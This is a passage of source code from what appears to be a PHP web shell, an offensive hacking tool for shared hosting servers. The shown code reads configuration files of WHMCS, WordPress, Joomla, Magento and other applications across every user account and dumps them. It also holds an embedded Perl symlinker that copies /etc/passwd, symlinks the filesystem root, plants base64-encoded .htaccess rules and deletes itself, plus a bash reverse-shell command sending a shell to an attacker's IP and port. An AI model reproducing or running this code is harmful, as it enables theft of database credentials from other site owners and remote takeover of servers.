907 "$user_docroot/Whm/submitticket.php" => "WHMCS",
908 "$user_docroot/whm/submitticket.php" => "WHMCS",
909 "$user_docroot/HOST/submitticket.php" => "WHMCS",
910 "$user_docroot/Host/submitticket.php" => "WHMCS",
911 "$user_docroot/host/submitticket.php" => "WHMCS",
912 "$user_docroot/SUPPORTES/submitticket.php" => "WHMCS",
913 "$user_docroot/Supportes/submitticket.php" => "WHMCS",
914 "$user_docroot/supportes/submitticket.php" => "WHMCS",
915 "$user_docroot/domains/submitticket.php" => "WHMCS",
916 "$user_docroot/domain/submitticket.php" => "WHMCS",
917 "$user_docroot/Hosting/submitticket.php" => "WHMCS",
918 "$user_docroot/HOSTING/submitticket.php" => "WHMCS",
919 "$user_docroot/hosting/submitticket.php" => "WHMCS",
920 "$user_docroot/CART/submitticket.php" => "WHMCS",
921 "$user_docroot/Cart/submitticket.php" => "WHMCS",
922 "$user_docroot/cart/submitticket.php" => "WHMCS",
923 "$user_docroot/ORDER/submitticket.php" => "WHMCS",
924 "$user_docroot/Order/submitticket.php" => "WHMCS",
925 "$user_docroot/order/submitticket.php" => "WHMCS",
926 "$user_docroot/CLIENT/submitticket.php" => "WHMCS",
927 "$user_docroot/Client/submitticket.php" => "WHMCS",
928 "$user_docroot/client/submitticket.php" => "WHMCS",
929 "$user_docroot/CLIENTAREA/submitticket.php" => "WHMCS",
930 "$user_docroot/Clientarea/submitticket.php" => "WHMCS",
931 "$user_docroot/clientarea/submitticket.php" => "WHMCS",
932 "$user_docroot/SUPPORT/submitticket.php" => "WHMCS",
933 "$user_docroot/Support/submitticket.php" => "WHMCS",
934 "$user_docroot/support/submitticket.php" => "WHMCS",
935 "$user_docroot/BILLING/submitticket.php" => "WHMCS",
936 "$user_docroot/Billing/submitticket.php" => "WHMCS",
937 "$user_docroot/billing/submitticket.php" => "WHMCS",
938 "$user_docroot/BUY/submitticket.php" => "WHMCS",
939 "$user_docroot/Buy/submitticket.php" => "WHMCS",
940 "$user_docroot/buy/submitticket.php" => "WHMCS",
941 "$user_docroot/MANAGE/submitticket.php" => "WHMCS",
942 "$user_docroot/Manage/submitticket.php" => "WHMCS",
943 "$user_docroot/manage/submitticket.php" => "WHMCS",
944 "$user_docroot/CLIENTSUPPORT/submitticket.php" => "WHMCS",
945 "$user_docroot/ClientSupport/submitticket.php" => "WHMCS",
946 "$user_docroot/Clientsupport/submitticket.php" => "WHMCS",
947 "$user_docroot/clientsupport/submitticket.php" => "WHMCS",
948 "$user_docroot/CHECKOUT/submitticket.php" => "WHMCS",
949 "$user_docroot/Checkout/submitticket.php" => "WHMCS",
950 "$user_docroot/checkout/submitticket.php" => "WHMCS",
951 "$user_docroot/BILLINGS/submitticket.php" => "WHMCS",
952 "$user_docroot/Billings/submitticket.php" => "WHMCS",
953 "$user_docroot/billings/submitticket.php" => "WHMCS",
954 "$user_docroot/BASKET/submitticket.php" => "WHMCS",
955 "$user_docroot/Basket/submitticket.php" => "WHMCS",
956 "$user_docroot/basket/submitticket.php" => "WHMCS",
957 "$user_docroot/SECURE/submitticket.php" => "WHMCS",
958 "$user_docroot/Secure/submitticket.php" => "WHMCS",
959 "$user_docroot/secure/submitticket.php" => "WHMCS",
960 "$user_docroot/SALES/submitticket.php" => "WHMCS",
961 "$user_docroot/Sales/submitticket.php" => "WHMCS",
962 "$user_docroot/sales/submitticket.php" => "WHMCS",
963 "$user_docroot/BILL/submitticket.php" => "WHMCS",
964 "$user_docroot/Bill/submitticket.php" => "WHMCS",
965 "$user_docroot/bill/submitticket.php" => "WHMCS",
966 "$user_docroot/PURCHASE/submitticket.php" => "WHMCS",
967 "$user_docroot/Purchase/submitticket.php" => "WHMCS",
968 "$user_docroot/purchase/submitticket.php" => "WHMCS",
969 "$user_docroot/ACCOUNT/submitticket.php" => "WHMCS",
970 "$user_docroot/Account/submitticket.php" => "WHMCS",
971 "$user_docroot/account/submitticket.php" => "WHMCS",
972 "$user_docroot/USER/submitticket.php" => "WHMCS",
973 "$user_docroot/User/submitticket.php" => "WHMCS",
974 "$user_docroot/user/submitticket.php" => "WHMCS",
975 "$user_docroot/CLIENTS/submitticket.php" => "WHMCS",
976 "$user_docroot/Clients/submitticket.php" => "WHMCS",
977 "$user_docroot/clients/submitticket.php" => "WHMCS",
978 "$user_docroot/BILLINGS/submitticket.php" => "WHMCS",
979 "$user_docroot/Billings/submitticket.php" => "WHMCS",
980 "$user_docroot/billings/submitticket.php" => "WHMCS",
981 "$user_docroot/MY/submitticket.php" => "WHMCS",
982 "$user_docroot/My/submitticket.php" => "WHMCS",
983 "$user_docroot/my/submitticket.php" => "WHMCS",
984 "$user_docroot/secure/whm/submitticket.php" => "WHMCS",
985 "$user_docroot/secure/whmcs/submitticket.php" => "WHMCS",
986 "$user_docroot/panel/submitticket.php" => "WHMCS",
987 "$user_docroot/clientes/submitticket.php" => "WHMCS",
988 "$user_docroot/cliente/submitticket.php" => "WHMCS",
989 "$user_docroot/support/order/submitticket.php" => "WHMCS",
990 "$user_docroot/bb-config.php" => "BoxBilling",
991 "$user_docroot/boxbilling/bb-config.php" => "BoxBilling",
992 "$user_docroot/box/bb-config.php" => "BoxBilling",
993 "$user_docroot/host/bb-config.php" => "BoxBilling",
994 "$user_docroot/Host/bb-config.php" => "BoxBilling",
995 "$user_docroot/supportes/bb-config.php" => "BoxBilling",
996 "$user_docroot/support/bb-config.php" => "BoxBilling",
997 "$user_docroot/hosting/bb-config.php" => "BoxBilling",
998 "$user_docroot/cart/bb-config.php" => "BoxBilling",
999 "$user_docroot/order/bb-config.php" => "BoxBilling",
1000 "$user_docroot/client/bb-config.php" => "BoxBilling",
1001 "$user_docroot/clients/bb-config.php" => "BoxBilling",
1002 "$user_docroot/cliente/bb-config.php" => "BoxBilling",
1003 "$user_docroot/clientes/bb-config.php" => "BoxBilling",
1004 "$user_docroot/billing/bb-config.php" => "BoxBilling",
1005 "$user_docroot/billings/bb-config.php" => "BoxBilling",
1006 "$user_docroot/my/bb-config.php" => "BoxBilling",
1007 "$user_docroot/secure/bb-config.php" => "BoxBilling",
1008 "$user_docroot/support/order/bb-config.php" => "BoxBilling",
1009 "$user_docroot/includes/dist-configure.php" => "Zencart",
1010 "$user_docroot/zencart/includes/dist-configure.php" => "Zencart",
1011 "$user_docroot/products/includes/dist-configure.php" => "Zencart",
1012 "$user_docroot/cart/includes/dist-configure.php" => "Zencart",
1013 "$user_docroot/shop/includes/dist-configure.php" => "Zencart",
1014 "$user_docroot/includes/iso4217.php" => "Hostbills",
1015 "$user_docroot/hostbills/includes/iso4217.php" => "Hostbills",
1016 "$user_docroot/host/includes/iso4217.php" => "Hostbills",
1017 "$user_docroot/Host/includes/iso4217.php" => "Hostbills",
1018 "$user_docroot/supportes/includes/iso4217.php" => "Hostbills",
1019 "$user_docroot/support/includes/iso4217.php" => "Hostbills",
1020 "$user_docroot/hosting/includes/iso4217.php" => "Hostbills",
1021 "$user_docroot/cart/includes/iso4217.php" => "Hostbills",
1022 "$user_docroot/order/includes/iso4217.php" => "Hostbills",
1023 "$user_docroot/client/includes/iso4217.php" => "Hostbills",
1024 "$user_docroot/clients/includes/iso4217.php" => "Hostbills",
1025 "$user_docroot/cliente/includes/iso4217.php" => "Hostbills",
1026 "$user_docroot/clientes/includes/iso4217.php" => "Hostbills",
1027 "$user_docroot/billing/includes/iso4217.php" => "Hostbills",
1028 "$user_docroot/billings/includes/iso4217.php" => "Hostbills",
1029 "$user_docroot/my/includes/iso4217.php" => "Hostbills",
1030 "$user_docroot/secure/includes/iso4217.php" => "Hostbills",
1031 "$user_docroot/support/order/includes/iso4217.php" => "Hostbills"
1032
1033 );
1034 foreach($getconfig as $config => $userconfig) {
1035 $get = file_get_contents($config);
1036 if($get == '') {
1037 }
1038 else {
1039 $fopen = fopen("idx_config/$user-$userconfig.txt", "w");
1040 fputs($fopen, $get);
1041 }
1042 }
1043 }
1044 }
1045 }
1046 print "<div style='background: #ffffff; width: 100%; height: 100%'>";
1047 print "<iframe src='http://".$_SERVER['HTTP_HOST']."/".$GLOBALS['FILEPATH']."/idx_config/' frameborder='0' scrolling='yes'><iframe>";
1048 print "</div>";
1049 }
1050 elseif($toolsname === "symlink") {
1051 if(!is_writable(path())) die(color(1, 1, "Directory '".path()."' is not writeable. Can't create directory 'idx_sym'."));
1052 if(!is_dir(path()."/idx_sym/")) {
1053 $sym['code'] = "#!/usr/bin/perl -I/usr/local/bandmin
# # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # 
#
#		Name : Perl/CGI Config Symlinker (With Auto Bypass Symlink 404)
#		Version : 1.2
#		Created : 9 Mei 2017
#		Author : 0x1999
#		Thanks To : 0xIDiot , Indonesian Code Party , Jatim4u
#		More Info : http://0xDark.blogspot.com
#		Want to recode ? Don't forget my nick name  :)
#		http://facebook.com/melex.1d
#		
# # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # 

use File::Copy;
use strict;
use warnings;
use MIME::Base64;
copy("/etc/passwd","passwd.txt") ;
mkdir "idx_sym";
symlink("/","idx_sym/root");
my $filename = 'passwd.txt';
my $htaccess = decode_base64("T3B0aW9ucyBJbmRleGVzIEZvbGxvd1N5bUxpbmtzDQpEaXJlY3RvcnlJbmRleCBpbmRveHBsb2l0Lmh0bQ0KQWRkVHlwZSB0ZXh0L3BsYWluIC5waHAgDQpBZGRIYW5kbGVyIHRleHQvcGxhaW4gLnBocA0KU2F0aXNmeSBBbnkNCkluZGV4T3B0aW9ucyArQ2hhcnNldD1VVEYtOCArRmFuY3lJbmRleGluZyArSWdub3JlQ2FzZSArRm9sZGVyc0ZpcnN0ICtYSFRNTCArSFRNTFRhYmxlICtTdXBwcmVzc1J1bGVzICtTdXBwcmVzc0Rlc2NyaXB0aW9uICtOYW1lV2lkdGg9KiANCkFkZEljb24gJ2RhdGE6aW1hZ2UvcG5nO2Jhc2U2NCxpVkJPUncwS0dnb0FBQUFOU1VoRVVnQUFBQkFBQUFBUUNBWUFBQUFmOC85aEFBQUFCSE5DU1ZRSUNBZ0lmQWhraUFBQUFBbHdTRmx6QUFBTjF3QUFEZGNCUWlpYmVBQUFBQmwwUlZoMFUyOW1kSGRoY21VQWQzZDNMbWx1YTNOallYQmxMbTl5WjV2dVBCb0FBQUZVU1VSQlZEaU5wWks5U2dOQkZJWFB2WE5uZGpjUm9wWDRVNGtXVnI1QUNoVTdIOEJTZkl0QUhrQjlDWHNyVzBHd0VRdFJ3VktNUnRBVThaY1lXYU5tTTJPeHF5eWlZWmRjR0lhWjRaNzdNZWVRY3c2REZBL1VEVUFBWUhIajhoT0FUajlvUlNlMloxZjJLalAxZmdMa25NUFM1bFcwVmk0cFpvcHZIWERXK0loT3I5OWdYVHprcjlxdlRCTXRyTmQ4QXNMVmNvbVpLRFA2MWtFTGloR0lKOVFCZ08yamRzSUUvSmI1T2FjR0ZBd0RRRWVNRU9abmgxRXFNQ2h0U0I4YTY0QlcyTU5oN1FWaWhDR0tjTkhzd21aMGxBa1lIeEY0UWhCUENLSVlSVTlsNjA1S21HQ0VJVVl6dENZTUJma0VqR1o0T2lId1JRRit2a1FHK3B0QUNJRlJFSlZQUUF2RmYrQnJqb3lRK0NaZnFxMTE4RFJGRWhqZWJiYmVsNmRHaXlUcWYrdlNya2FSUS8wdXRMN21IWGw5dnErZVAzVW5iaC9INWdES2lPRjY3WWViWTBkU0pjUkJtMHoyckZsMnlXcDhBVkRJVzMyZGE3cExBQUFBQUVsRlRrU3VRbUNDJyBeXkRJUkVDVE9SWV5eDQpEZWZhdWx0SWNvbiAnZGF0YTppbWFnZS9wbmc7YmFzZTY0LGlWQk9SdzBLR2dvQUFBQU5TVWhFVWdBQUFCQUFBQUFRQ0FZQUFBQWY4LzloQUFBQUFYTlNSMElBcnM0YzZRQUFBQVppUzBkRUFQOEEvd0Qvb0wybmt3QUFBQWx3U0ZsekFBQUxFd0FBQ3hNQkFKcWNHQUFBQUFkMFNVMUZCOW9KQmhjVEp2MkIyZDRBQUFKTVNVUkJWRGpMYlpPOVRoeFpFSVcvcWx2ZHRNMzhCTmdKUW1RZ0pHZCtBL01RQkx3R2ppd0gzbndka1NMdE8yeEVSRzVMcXhYUlNJUjJZRGZENEdrR00wUDNyYjRiOVBBejBsN3BTbFdsVzBmbm5Mb2xBSVBCNFBYaDRlRnVudWNBSUlMd2RFU2VaeUFpZm5wNit1OW9OTG8zZ00zTnpUZEhSKy8venZKTXpTeUpLS29kaUlnOEFYYXhlSXoxYkRaN014cU5mdGdTVVJEV3k3TFVuWjBkWW14QUZBVkVsSTZBRUN5Z0lzUVFzaXpMQk9BQkFET2pLQXBxaDd1N0dvQ1VXaXdZYmV0b1VIcnJQY3dDcW9GMktVZVhMekV6QnYwK3VRbVNITUVaOUY2U1pjcjZpNElzQk9hL2I3SFFNYUh0SUF3Z0xkSGFsREExZXYwZVFiU2pyRXJRd0pwcUY0ZUF4L2hvcUQxMzJtTWtKcmk1dVNPbEZoRWhwVVFJaW9qd2FtT0ROc2xqZlVXQ3FwTG5PYWFDU0tKdG5hQkNzWllqQWxsbVhJNHZhZW9hVlgwY2JTZGhtVVIzekFLdk5qWTZWaW9vMHRXemdFb25LYlcrS2tHV3QzVW50MENlR2ZKczlnK1VVMHJFR0hIL0h3L01qSDYvVCtQT2RGb1JOS0NoTTIyeG1PUGVzcGpQR1E2SHBOUTI3dDZzQUNEU05hbnlvbGpETEVkVmFGT0xlOFprVWpLNXVrcTN0NzlsUEM3L09EazVHYStZNk81TXF5bU53M1YxeTNoeXpmWDBocXZKTHliWEZkKytmMmQzZDBkbXMrcXZnNE9EejhmSHgwL0xzYmUzOTY0c1M3KzR1RWp1bnBxbVNlNmUzRDNONS9OMFdaYnRseTlmMDluWjJaL2IyOXYyZkxFZXZ2SzlxdjdjMnRvS2k4VWlpUWlxSGJtNnJpVzZhMTNmbit6djczK29xb3JoY0xnS1VGWFZQK2ZuNTIrTG9uajhJTEowUDhaSUNDRjkvUFRwQ2xocEJ2Z1BlbG9MOVU1NU5JQUFBQUFBU1VWT1JLNUNZSUk9Jw0KSW5kZXhJZ25vcmUgKi50eHQ0MDQNCkluZGV4U3R5bGVTaGVldCAnaHR0cDovL2V2ZW50LmluZG94cGxvaXQub3IuaWQvc3ltbGluay5jc3MnDQpSZXdyaXRlRW5naW5lIE9uDQpSZXdyaXRlQ29uZCAle1JFUVVFU1RfRklMRU5BTUV9IF4uKjB4c3ltNDA0IFtOQ10NClJld3JpdGVSdWxlIFwudHh0JCAle1JFUVVFU1RfVVJJfTQwNCBbTCxSPTMwMi5OQ10=");
my $sym = decode_base64("T3B0aW9ucyBJbmRleGVzIEZvbGxvd1N5bUxpbmtzDQpEaXJlY3RvcnlJbmRleCBpbmRveHBsb2l0Lmh0bQ0KSGVhZGVyTmFtZSAweDE5OTkudHh0DQpTYXRpc2Z5IEFueQ0KSW5kZXhPcHRpb25zIElnbm9yZUNhc2UgRmFuY3lJbmRleGluZyBGb2xkZXJzRmlyc3QgTmFtZVdpZHRoPSogRGVzY3JpcHRpb25XaWR0aD0qIFN1cHByZXNzSFRNTFByZWFtYmxlDQpJbmRleElnbm9yZSAqDQpJbmRleFN0eWxlU2hlZXQgJ2h0dHA6Ly9ldmVudC5pbmRveHBsb2l0Lm9yLmlkL3N5bWxpbmsuY3NzJw==");
open(my $fh1, '>', 'idx_sym/.htaccess');
print $fh1 "$htaccess";
close $fh1;
open(my $xx, '>', 'idx_sym/nemu.txt');
print $xx "$sym";
close $xx;
open(my $fh, '<:encoding(UTF-8)', $filename);
while (my $row = <$fh>) {
my @matches = $row =~ /(.*?):x:/g;
my $usernya = $1;
my @array = (
	{configdir => '/home/'.$usernya.'/.accesshash', type => 'WHM-accesshash' },
	{configdir => '/home/'.$usernya.'/public_html/config/koneksi.php', type => 'Lokomedia' },
	{configdir => '/home/'.$usernya.'/public_html/config/settings.inc.php', type => 'PrestaShop' },
	{configdir => '/home/'.$usernya.'/public_html/app/etc/local.xml', type => 'Magento' },
	{configdir => '/home/'.$usernya.'/public_html/admin/config.php', type => 'OpenCart' },
	{configdir => '/home/'.$usernya.'/public_html/application/config/database.php', type => 'Ellislab' },
	{configdir => '/home/'.$usernya.'/public_html/wp-config.php', type => 'Wordpress' },
	{configdir => '/home/'.$usernya.'/public_html/wp/test/wp-config.php', type => 'Wordpress' },
	{configdir => '/home/'.$usernya.'/public_html/blog/wp-config.php', type => 'Wordpress' },
	{configdir => '/home/'.$usernya.'/public_html/beta/wp-config.php', type => 'Wordpress' },
	{configdir => '/home/'.$usernya.'/public_html/portal/wp-config.php', type => 'Wordpress' },
	{configdir => '/home/'.$usernya.'/public_html/site/wp-config.php', type => 'Wordpress' },
	{configdir => '/home/'.$usernya.'/public_html/wp/wp-config.php', type => 'Wordpress' },
	{configdir => '/home/'.$usernya.'/public_html/WP/wp-config.php', type => 'Wordpress' },
	{configdir => '/home/'.$usernya.'/public_html/news/wp-config.php', type => 'Wordpress' },
	{configdir => '/home/'.$usernya.'/public_html/wordpress/wp-config.php', type => 'Wordpress' },
	{configdir => '/home/'.$usernya.'/public_html/test/wp-config.php', type => 'Wordpress' },
	{configdir => '/home/'.$usernya.'/public_html/demo/wp-config.php', type => 'Wordpress' },
	{configdir => '/home/'.$usernya.'/public_html/home/wp-config.php', type => 'Wordpress' },
	{configdir => '/home/'.$usernya.'/public_html/v1/wp-config.php', type => 'Wordpress' },
	{configdir => '/home/'.$usernya.'/public_html/v2/wp-config.php', type => 'Wordpress' },
	{configdir => '/home/'.$usernya.'/public_html/press/wp-config.php', type => 'Wordpress' },
	{configdir => '/home/'.$usernya.'/public_html/new/wp-config.php', type => 'Wordpress' },
	{configdir => '/home/'.$usernya.'/public_html/blogs/wp-config.php', type => 'Wordpress' },
	{configdir => '/home/'.$usernya.'/public_html/configuration.php', type => 'Joomla' },
	{configdir => '/home/'.$usernya.'/public_html/blog/configuration.php', type => 'Joomla' },
	{configdir => '/home/'.$usernya.'/public_html/submitticket.php', type => '^WHMCS' },
	{configdir => '/home/'.$usernya.'/public_html/cms/configuration.php', type => 'Joomla' },
	{configdir => '/home/'.$usernya.'/public_html/beta/configuration.php', type => 'Joomla' },
	{configdir => '/home/'.$usernya.'/public_html/portal/configuration.php', type => 'Joomla' },
	{configdir => '/home/'.$usernya.'/public_html/site/configuration.php', type => 'Joomla' },
	{configdir => '/home/'.$usernya.'/public_html/main/configuration.php', type => 'Joomla' },
	{configdir => '/home/'.$usernya.'/public_html/home/configuration.php', type => 'Joomla' },
	{configdir => '/home/'.$usernya.'/public_html/demo/configuration.php', type => 'Joomla' },
	{configdir => '/home/'.$usernya.'/public_html/test/configuration.php', type => 'Joomla' },
	{configdir => '/home/'.$usernya.'/public_html/v1/configuration.php', type => 'Joomla' },
	{configdir => '/home/'.$usernya.'/public_html/v2/configuration.php', type => 'Joomla' },
	{configdir => '/home/'.$usernya.'/public_html/joomla/configuration.php', type => 'Joomla' },
	{configdir => '/home/'.$usernya.'/public_html/new/configuration.php', type => 'Joomla' },
	{configdir => '/home/'.$usernya.'/public_html/WHMCS/submitticket.php', type => 'WHMCS' },
	{configdir => '/home/'.$usernya.'/public_html/whmcs1/submitticket.php', type => 'WHMCS' },
	{configdir => '/home/'.$usernya.'/public_html/Whmcs/submitticket.php', type => 'WHMCS' },
	{configdir => '/home/'.$usernya.'/public_html/whmcs/submitticket.php', type => 'WHMCS' },
	{configdir => '/home/'.$usernya.'/public_html/whmcs/submitticket.php', type => 'WHMCS' },
	{configdir => '/home/'.$usernya.'/public_html/WHMC/submitticket.php', type => 'WHMCS' },
	{configdir => '/home/'.$usernya.'/public_html/Whmc/submitticket.php', type => 'WHMCS' },
	{configdir => '/home/'.$usernya.'/public_html/whmc/submitticket.php', type => 'WHMCS' },
	{configdir => '/home/'.$usernya.'/public_html/WHM/submitticket.php', type => 'WHMCS' },
	{configdir => '/home/'.$usernya.'/public_html/Whm/submitticket.php', type => 'WHMCS' },
	{configdir => '/home/'.$usernya.'/public_html/whm/submitticket.php', type => 'WHMCS' },
	{configdir => '/home/'.$usernya.'/public_html/HOST/submitticket.php', type => 'WHMCS' },
	{configdir => '/home/'.$usernya.'/public_html/Host/submitticket.php', type => 'WHMCS' },
	{configdir => '/home/'.$usernya.'/public_html/host/submitticket.php', type => 'WHMCS' },
	{configdir => '/home/'.$usernya.'/public_html/SUPPORTES/submitticket.php', type => 'WHMCS' },
	{configdir => '/home/'.$usernya.'/public_html/Supportes/submitticket.php', type => 'WHMCS' },
	{configdir => '/home/'.$usernya.'/public_html/supportes/submitticket.php', type => 'WHMCS' },
	{configdir => '/home/'.$usernya.'/public_html/domains/submitticket.php', type => 'WHMCS' },
	{configdir => '/home/'.$usernya.'/public_html/domain/submitticket.php', type => 'WHMCS' },
	{configdir => '/home/'.$usernya.'/public_html/Hosting/submitticket.php', type => 'WHMCS' },
	{configdir => '/home/'.$usernya.'/public_html/HOSTING/submitticket.php', type => 'WHMCS' },
	{configdir => '/home/'.$usernya.'/public_html/hosting/submitticket.php', type => 'WHMCS' },
	{configdir => '/home/'.$usernya.'/public_html/CART/submitticket.php', type => 'WHMCS' },
	{configdir => '/home/'.$usernya.'/public_html/Cart/submitticket.php', type => 'WHMCS' },
	{configdir => '/home/'.$usernya.'/public_html/cart/submitticket.php', type => 'WHMCS' },
	{configdir => '/home/'.$usernya.'/public_html/ORDER/submitticket.php', type => 'WHMCS' },
	{configdir => '/home/'.$usernya.'/public_html/Order/submitticket.php', type => 'WHMCS' },
	{configdir => '/home/'.$usernya.'/public_html/order/submitticket.php', type => 'WHMCS' },
	{configdir => '/home/'.$usernya.'/public_html/CLIENT/submitticket.php', type => 'WHMCS' },
	{configdir => '/home/'.$usernya.'/public_html/Client/submitticket.php', type => 'WHMCS' },
	{configdir => '/home/'.$usernya.'/public_html/client/submitticket.php', type => 'WHMCS' },
	{configdir => '/home/'.$usernya.'/public_html/CLIENTAREA/submitticket.php', type => 'WHMCS' },
	{configdir => '/home/'.$usernya.'/public_html/Clientarea/submitticket.php', type => 'WHMCS' },
	{configdir => '/home/'.$usernya.'/public_html/clientarea/submitticket.php', type => 'WHMCS' },
	{configdir => '/home/'.$usernya.'/public_html/SUPPORT/submitticket.php', type => 'WHMCS' },
	{configdir => '/home/'.$usernya.'/public_html/Support/submitticket.php', type => 'WHMCS' },
	{configdir => '/home/'.$usernya.'/public_html/support/submitticket.php', type => 'WHMCS' },
	{configdir => '/home/'.$usernya.'/public_html/BILLING/submitticket.php', type => 'WHMCS' },
	{configdir => '/home/'.$usernya.'/public_html/Billing/submitticket.php', type => 'WHMCS' },
	{configdir => '/home/'.$usernya.'/public_html/billing/submitticket.php', type => 'WHMCS' },
	{configdir => '/home/'.$usernya.'/public_html/BUY/submitticket.php', type => 'WHMCS' },
	{configdir => '/home/'.$usernya.'/public_html/Buy/submitticket.php', type => 'WHMCS' },
	{configdir => '/home/'.$usernya.'/public_html/buy/submitticket.php', type => 'WHMCS' },
	{configdir => '/home/'.$usernya.'/public_html/MANAGE/submitticket.php', type => 'WHMCS' },
	{configdir => '/home/'.$usernya.'/public_html/Manage/submitticket.php', type => 'WHMCS' },
	{configdir => '/home/'.$usernya.'/public_html/manage/submitticket.php', type => 'WHMCS' },
	{configdir => '/home/'.$usernya.'/public_html/CLIENTSUPPORT/submitticket.php', type => 'WHMCS' },
	{configdir => '/home/'.$usernya.'/public_html/ClientSupport/submitticket.php', type => 'WHMCS' },
	{configdir => '/home/'.$usernya.'/public_html/Clientsupport/submitticket.php', type => 'WHMCS' },
	{configdir => '/home/'.$usernya.'/public_html/clientsupport/submitticket.php', type => 'WHMCS' },
	{configdir => '/home/'.$usernya.'/public_html/CHECKOUT/submitticket.php', type => 'WHMCS' },
	{configdir => '/home/'.$usernya.'/public_html/Checkout/submitticket.php', type => 'WHMCS' },
	{configdir => '/home/'.$usernya.'/public_html/checkout/submitticket.php', type => 'WHMCS' },
	{configdir => '/home/'.$usernya.'/public_html/BILLINGS/submitticket.php', type => 'WHMCS' },
	{configdir => '/home/'.$usernya.'/public_html/Billings/submitticket.php', type => 'WHMCS' },
	{configdir => '/home/'.$usernya.'/public_html/billings/submitticket.php', type => 'WHMCS' },
	{configdir => '/home/'.$usernya.'/public_html/BASKET/submitticket.php', type => 'WHMCS' },
	{configdir => '/home/'.$usernya.'/public_html/Basket/submitticket.php', type => 'WHMCS' },
	{configdir => '/home/'.$usernya.'/public_html/basket/submitticket.php', type => 'WHMCS' },
	{configdir => '/home/'.$usernya.'/public_html/SECURE/submitticket.php', type => 'WHMCS' },
	{configdir => '/home/'.$usernya.'/public_html/Secure/submitticket.php', type => 'WHMCS' },
	{configdir => '/home/'.$usernya.'/public_html/secure/submitticket.php', type => 'WHMCS' },
	{configdir => '/home/'.$usernya.'/public_html/SALES/submitticket.php', type => 'WHMCS' },
	{configdir => '/home/'.$usernya.'/public_html/Sales/submitticket.php', type => 'WHMCS' },
	{configdir => '/home/'.$usernya.'/public_html/sales/submitticket.php', type => 'WHMCS' },
	{configdir => '/home/'.$usernya.'/public_html/BILL/submitticket.php', type => 'WHMCS' },
	{configdir => '/home/'.$usernya.'/public_html/Bill/submitticket.php', type => 'WHMCS' },
	{configdir => '/home/'.$usernya.'/public_html/bill/submitticket.php', type => 'WHMCS' },
	{configdir => '/home/'.$usernya.'/public_html/PURCHASE/submitticket.php', type => 'WHMCS' },
	{configdir => '/home/'.$usernya.'/public_html/Purchase/submitticket.php', type => 'WHMCS' },
	{configdir => '/home/'.$usernya.'/public_html/purchase/submitticket.php', type => 'WHMCS' },
	{configdir => '/home/'.$usernya.'/public_html/ACCOUNT/submitticket.php', type => 'WHMCS' },
	{configdir => '/home/'.$usernya.'/public_html/Account/submitticket.php', type => 'WHMCS' },
	{configdir => '/home/'.$usernya.'/public_html/account/submitticket.php', type => 'WHMCS' },
	{configdir => '/home/'.$usernya.'/public_html/USER/submitticket.php', type => 'WHMCS' },
	{configdir => '/home/'.$usernya.'/public_html/User/submitticket.php', type => 'WHMCS' },
	{configdir => '/home/'.$usernya.'/public_html/user/submitticket.php', type => 'WHMCS' },
	{configdir => '/home/'.$usernya.'/public_html/CLIENTS/submitticket.php', type => 'WHMCS' },
	{configdir => '/home/'.$usernya.'/public_html/Clients/submitticket.php', type => 'WHMCS' },
	{configdir => '/home/'.$usernya.'/public_html/clients/submitticket.php', type => 'WHMCS' },
	{configdir => '/home/'.$usernya.'/public_html/BILLINGS/submitticket.php', type => 'WHMCS' },
	{configdir => '/home/'.$usernya.'/public_html/Billings/submitticket.php', type => 'WHMCS' },
	{configdir => '/home/'.$usernya.'/public_html/billings/submitticket.php', type => 'WHMCS' },
	{configdir => '/home/'.$usernya.'/public_html/MY/submitticket.php', type => 'WHMCS' },
	{configdir => '/home/'.$usernya.'/public_html/My/submitticket.php', type => 'WHMCS' },
	{configdir => '/home/'.$usernya.'/public_html/my/submitticket.php', type => 'WHMCS' },
	{configdir => '/home/'.$usernya.'/public_html/secure/whm/submitticket.php', type => 'WHMCS' },
	{configdir => '/home/'.$usernya.'/public_html/secure/whmcs/submitticket.php', type => 'WHMCS' },
	{configdir => '/home/'.$usernya.'/public_html/panel/submitticket.php', type => 'WHMCS' },
	{configdir => '/home/'.$usernya.'/public_html/clientes/submitticket.php', type => 'WHMCS' },
	{configdir => '/home/'.$usernya.'/public_html/cliente/submitticket.php', type => 'WHMCS' },
	{configdir => '/home/'.$usernya.'/public_html/support/order/submitticket.php', type => 'WHMCS' }
);
foreach (@array){
	my $confignya = $_->{configdir};
	my $typeconfig = $_->{type};
	symlink("$confignya","idx_sym/$usernya-$typeconfig.txt");
	mkdir "idx_sym/$usernya-$typeconfig.txt";
	symlink("$confignya","idx_sym/$usernya-$typeconfig.txt/0x1999.txt");
	copy("idx_sym/nemu.txt","idx_sym/$usernya-$typeconfig.txt/.htaccess") ;
	}
}
print "Content-type: text/html\n\n";
print "<head><title>Bypass 404 By 0x1999</title></head>";
print '<meta http-equiv="refresh" content="5; url=idx_sym"/>';
print '<body><center><h1>0x1999 Never Die</h1>';
print '<a href="idx_sym">Klik Disini</a>';
unlink($0);";
1054 save("/tmp/symlink.pl", "w", base64_decode($sym['code']));
1055 exe("perl /tmp/symlink.pl");
1056 sleep(1);
1057 @unlink("/tmp/symlink.pl");
1058 @unlink("passwd.txt");
1059 @unlink("idx_sym/pas.txt");
1060 @unlink("idx_sym/nemu.txt");
1061 }
1062
1063 print "<div style='background: #ffffff; width: 100%; height: 100%'>";
1064 print "<iframe src='http://".$_SERVER['HTTP_HOST']."/".$GLOBALS['FILEPATH']."/idx_sym/' frameborder='0' scrolling='yes'></iframe>";
1065 print "</div>";
1066 }
1067 elseif($toolsname === "network") {
1068 $args = explode(" ", $args);
1069
1070 if($args[0] === "bc") {
1071 if(empty($args[1])) die(color(1, 1, "Set Your IP for BackConnect!"));
1072 if(empty($args[2])) die(color(1, 1, "Set Your PORT for BackConnect!"));
1073 if(empty($args[3])) die(color(1, 1, "Missing type of reverse shell: 'bash', 'perl'."));
1074
1075 if($args[3] === "bash") {
1076 exe("/bin/bash -i >& /dev/tcp/".$args[1]."/".$args[2]." 0>&1");
1077 }
1078 elseif($args[3] === "perl") {
